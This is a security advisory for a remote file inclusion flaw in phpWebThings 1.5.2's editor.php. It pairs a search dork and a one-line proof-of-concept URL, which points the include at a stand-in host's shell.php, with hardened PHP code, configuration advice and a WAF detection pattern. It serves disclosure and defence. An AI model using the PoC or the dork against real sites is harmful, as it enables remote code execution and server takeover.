SECURITYVULNS:DOC:15160
Nov 20, 2006 - 12:00 a.m.

phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability

vulners.com

+------------------------------------------------------------------------------------------
phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability
+------------------------------------------------------------------------------------------
Affected Software: phpWebThings 1.5.2
Vendor: http://www.phpwebthings.nl/
Download: http://prdownloads.sourceforge.net/phpwebthings/phpwebthings_1_5_2.zip?download
Description: "phpWebThings is a Powerful, professional application framework"
Dork: "This website was created with phpWebThings"
Class: Remote File Inclusion
Risk: High (Remote File Execution)
Found By: nuffsaid <nuffsaid[at]newbslove.us>
+------------------------------------------------------------------------------------------
Details:

phpWebThings 1.5.2 core/editor.php does not initialize the $editor_insert_bottom variable
before using it to include files. With register_globals = on, the variable can be set from
the query string, so a remote file of the requester's choice is included and executed.

Vulnerable Code:

core/editor.php, line 289:

  289: if ($editor_insert_bottom<>"") include($editor_insert_bottom);

Proof Of Concept:

http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php
+------------------------------------------------------------------------------------------
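The root cause above is an include() driven by a variable that is never initialized, so register_globals hands it straight to the request. The following is an added example, not phpWebThings code: it restates the vulnerable pattern and places a hardened form beside it. The template directory, the allowlist keys and file names, and the function names other than $editor_insert_bottom are assumptions made for the example.

```php
<?php
// Added example (not phpWebThings code). The template directory, allowlist and
// function names here are constructed for illustration.

// --- Vulnerable pattern as described in the advisory ---
// $editor_insert_bottom is never initialised. With register_globals=On, PHP fills it
// from the query string, and with allow_url_include enabled include() will fetch and
// execute whatever URL it holds.
function vulnerable_include_bottom() {
    global $editor_insert_bottom;              // may arrive via ?editor_insert_bottom=...
    if ($editor_insert_bottom <> "") include($editor_insert_bottom);
}

// --- Hardened form ---
// 1. Initialise the variable explicitly so register_globals cannot pre-populate it.
// 2. Accept only a short key from the request, never a path or URL, and map it
//    through a fixed allowlist.
// 3. Resolve the chosen file with realpath() and confirm it stays under the
//    template directory before including it.
const EDITOR_TEMPLATE_DIR = __DIR__ . '/templates/editor';   // constructed location
const EDITOR_BOTTOM_FRAGMENTS = [                            // hypothetical allowlist
    'default' => 'bottom_default.php',
    'compact' => 'bottom_compact.php',
];

function safe_include_bottom(string $fragment_key = 'default'): bool {
    $editor_insert_bottom = '';                 // explicit initialisation, no globals
    if (!array_key_exists($fragment_key, EDITOR_BOTTOM_FRAGMENTS)) {
        return false;                           // unknown key: include nothing
    }
    $base      = realpath(EDITOR_TEMPLATE_DIR);
    $candidate = realpath(EDITOR_TEMPLATE_DIR . '/' . EDITOR_BOTTOM_FRAGMENTS[$fragment_key]);
    // realpath() returns false for missing files and collapses "..", so a prefix
    // check on the resolved paths guarantees the include stays inside the directory.
    if ($base === false || $candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    $editor_insert_bottom = $candidate;         // a local file chosen by the server
    include $editor_insert_bottom;
    return true;
}

// The caller passes the request value as a key only; it can no longer name a file or URL.
// safe_include_bottom(isset($_GET['editor_bottom']) ? (string) $_GET['editor_bottom'] : 'default');
```

Code changes of this kind should be paired with the interpreter settings that remove the two enabling conditions: register_globals = Off (the directive was removed entirely in PHP 5.4) and allow_url_include = Off, so that even an unvalidated include() cannot reach a remote URL. A web server or WAF rule that flags `editor_insert_bottom=` parameters carrying `http://`, `https://` or `ftp://` values gives a cheap detection signal for scanning against unpatched 1.5.2 installs.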